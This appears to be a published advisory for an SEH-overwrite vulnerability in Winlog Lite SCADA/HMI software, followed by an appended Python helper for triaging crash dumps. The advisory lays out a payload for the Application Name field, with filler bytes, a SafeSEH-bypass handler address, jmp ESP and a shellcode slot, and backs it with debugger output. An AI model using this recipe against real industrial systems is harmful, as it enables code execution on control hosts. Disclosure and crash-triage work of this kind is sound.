######################################################################################
# Vuln Title: Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability
#
# Author: FaryadR (a.k.a Ciph3r)
# Tested on: WinXP SP3 and Winlog Lite 2.06.17
# Twitter: https://twitter.com/faryadR
# Mail: Ciph3r.secure@gmail.com
# Website: http://0c0c0c0c.com
# Vendor: http://www.sielcosistemi.com
#
######################################################################################

[+] Application Description:

Winlog Lite is the entry-level version of the SCADA/HMI software Winlog Pro offered by Sielco Sistemi, intended to allow an evaluation of the capabilities and ease of use of the package; Winlog Lite is also a powerful and low-cost solution for building small supervisory applications. Winlog Lite makes available most of the development tools and functions provided by the Winlog Pro software package, but limits the applications it can develop and run to a maximum of 24 tags. Winlog Lite does not include the Symbol Factory library or web support. Winlog Lite can be run both in Demo mode (without registration) and in Full mode; in Demo mode, communication with external devices and sampling of external tags stops automatically after 15 minutes (it can be restarted manually if required); in Full mode communication continues without any time limit.
[+] Proof Of Concept:

Run Winlog Lite SCADA HMI system, go to the Tools menu and open Application Builder. With the program attached to a debugger, we can inject our data into the Application Name field and click the Build button. The injected data is laid out as follows:

9986 bytes of "A"
+ Pointer to next SEH record (6-byte jmp)
+ SE handler --> non-SafeSEH address (0x32450A7B), used to bypass SafeSEH protection
+ NOP
+ jmp ESP (0x7C86467B)
+ shellcode
00385319  90           NOP
0038531A  90           NOP
0038531B  90           NOP
0038531C  55           PUSH EBP
0038531D  8BEC         MOV EBP,ESP
0038531F  53           PUSH EBX
00385320  8B00         MOV EAX,DWORD PTR DS:[EAX]
00385322  8B12         MOV EDX,DWORD PTR DS:[EDX]
00385324  E8 AD020000  CALL
00385329  0F94C0       SETE AL
0038532C  83E0 01      AND EAX,1
0038532F  5B           POP EBX
00385330  5D           POP EBP
00385331  C3           RETN
00385332  90           NOP
00385333  90           NOP
00385334  55           PUSH EBP
00385335  8BEC         MOV EBP,ESP
00385337  53           PUSH EBX
00385338  8B00         MOV EAX,DWORD PTR DS:[EAX]   --------> Crashed!
0038533A  8B12         MOV EDX,DWORD PTR DS:[EDX]
0038533C  E8 95020000  CALL
00385341  0F95C0       SETNE AL
00385344  83E0 01      AND EAX,1
00385347  5B           POP EBX
00385348  5D           POP EBP
00385349  C3           RETN
0038534A  90           NOP
0038534B  90           NOP
0038534C  55           PUSH EBP
0038534D  8BEC         MOV EBP,ESP
0038534F  83C4 CC      ADD ESP,-34
00385352  53           PUSH EBX
00385353  894D F8      MOV DWORD PTR SS:[EBP-8],ECX
00385356  8955 D0      MOV DWORD PTR SS:[EBP-30],EDX
00385359  8BD8         MOV EBX,EAX
0038535B  B8 007B3800  MOV EAX,DbfIntf.00387B00
00385360  E8 C3FDFFFF  CALL DbfIntf.00385128

[+] Attributes: thunk

; __fastcall Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *)
@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent proc near
        jmp ds:__imp_@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent ; Dbf_fields::TDbfFieldDefs::TDbfFieldDefs(Classes::TPersistent *)
@Dbf_fields@TDbfFieldDefs@$bctr$qqrp19Classes@TPersistent endp

(1cec.1e7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000000 ecx=00000000 edx=0012cae4 esi=0012cb74 edi=41414141
eip=00385338 esp=0012ca94 ebp=0012ca98 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\DbfIntf.dll -
DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c:
00385338 8b00            mov     eax,dword ptr [eax]  ds:0023:41414141=????????

0:000> u
DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c:
00385338 8b00            mov     eax,dword ptr [eax]
0038533a 8b12            mov     edx,dword ptr [edx]
0038533c e895020000      call    DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0xb0a (003855d6)
00385341 0f95c0          setne   al
00385344 83e001          and     eax,1
00385347 5b              pop     ebx
00385348 5d              pop     ebp
00385349 c3              ret

0:000> !exchain
0012caac: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012cb24: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012f2ec: +43434342 (43434343)
Invalid exception stack at 42424242

0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ca98 003816dd 41414141 0012cba0 00000000 DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+0x86c
0012caf4 0038219f 0012cb70 41414141 0012cb74 DbfIntf+0x16dd
*** WARNING: Unable to verify checksum for C:\Program Files\Winlog Lite\Bin\ABuilder.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Winlog Lite\Bin\ABuilder.exe -
0012cb80 00404098 41414141 00000001 0012cba0 DbfIntf!DbiCreateTable+0xf3
0012f314 41414141 41414141 41414141 41414141 ABuilder!FormsTForm$bdtr$qqrv+0x15f4
0012f318 41414141 41414141 41414141 41414141 +0x41414140
0012f31c 41414141 41414141 41414141 41414141 +0x41414140
0012f320 41414141 41414141 41414141 41414141 +0x41414140
0012f324 41414141 41414141 41414141 41414141 +0x41414140
0012f328 41414141 41414141 41414141 41414141 +0x41414140
0012f32c 41414141 41414141 41414141 41414141 +0x41414140
0012f330 41414141 41414141 41414141 41414141 +0x41414140
0012f334 41414141 41414141 41414141 41414141 +0x41414140
0012f338 41414141 41414141 41414141 41414141 +0x41414140
0012f33c 41414141 41414141 41414141 41414141 +0x41414140
0012f340 41414141 41414141 41414141 41414141 +0x41414140
0012f344 41414141 41414141 41414141 41414141 +0x41414140
0012f348 41414141 41414141 41414141 41414141 +0x41414140
0012f34c 41414141 41414141 41414141 41414141 +0x41414140
0012f350 41414141 41414141 41414141 41414141 +0x41414140
0012f354 41414141 41414141 41414141 41414141 +0x41414140

[+] 0verwrite SEH Pointer:

0012F2D4  41414141  AAAA
0012F2D8  41414141  AAAA
0012F2DC  41414141  AAAA
0012F2E0  41414141  AAAA
0012F2E4  41414141  AAAA
0012F2E8  41414141  AAAA
0012F2EC  42424242  BBBB  Pointer to next SEH record
0012F2F0  43434343  CCCC  SE handler
0012F2F4  41414141  AAAA
0012F2F8  41414141  AAAA
0012F2FC  41414141  AAAA
0012F300  41414141  AAAA
0012F304  41414141  AAAA
0012F308  41414141  AAAA
0012F30C  41414141  AAAA
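The `!exchain` output above is the evidence that the SEH chain was overwritten: the last record's handler does not resolve to any loaded module and the next-record pointer is rejected as invalid. The following crash-triage helper, an added example that is not part of the original advisory, parses that WinDbg output (reproduced here as a constructed sample) and flags exactly those two conditions plus repeated-byte handler values, so a fuzzing or crash-analysis pipeline can classify a crash as an SEH overwrite before anyone looks at it by hand.

```python
import re

# Constructed sample input: the `!exchain` output from the crash above.
EXCHAIN_OUTPUT = """\
0012caac: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012cb24: DbfIntf!Dbf_fieldsTDbfFieldDefs$bdtr$qqrv+e6e (0038593a)
0012f2ec: +43434342 (43434343)
Invalid exception stack at 42424242
"""

# WinDbg prints one registration record per line: "<record>: <symbol> (<handler>)".
# A handler WinDbg cannot map to a loaded module is shown as a bare "+offset".
RECORD_RE = re.compile(r"^([0-9a-f]{8}):\s+(\S+)\s+\(([0-9a-f]{8})\)\s*$", re.I)
INVALID_RE = re.compile(r"^Invalid exception stack at ([0-9a-f]{8})", re.I)

def parse_exchain(text):
    """Return ([(record_addr, handler_addr, module_symbol_or_None)], invalid_next_ptr)."""
    records, invalid_next = [], None
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            sym = m.group(2) if "!" in m.group(2) else None  # resolved symbols carry "module!"
            records.append((int(m.group(1), 16), int(m.group(3), 16), sym))
            continue
        m = INVALID_RE.match(line)
        if m:
            invalid_next = int(m.group(1), 16)
    return records, invalid_next

def is_repeated_byte(value):
    """True for values such as 0x41414141 or 0x43434343, the signature of a filler overwrite."""
    return len(set(value.to_bytes(4, "little"))) == 1

def triage(text):
    """Flag SEH records that point outside loaded modules or look like filler bytes."""
    findings = []
    records, invalid_next = parse_exchain(text)
    for rec_addr, handler, sym in records:
        if sym is None:
            findings.append(f"{rec_addr:08x}: handler {handler:08x} not inside any loaded module")
        if is_repeated_byte(handler):
            findings.append(f"{rec_addr:08x}: handler {handler:08x} is repeated-byte filler")
    if invalid_next is not None:
        findings.append(f"next-record pointer {invalid_next:08x} is invalid; chain is corrupted")
    return findings
```

On the sample above, `triage(EXCHAIN_OUTPUT)` reports three findings for the record at 0012f2ec and the invalid next pointer, while the two intact DbfIntf records produce none.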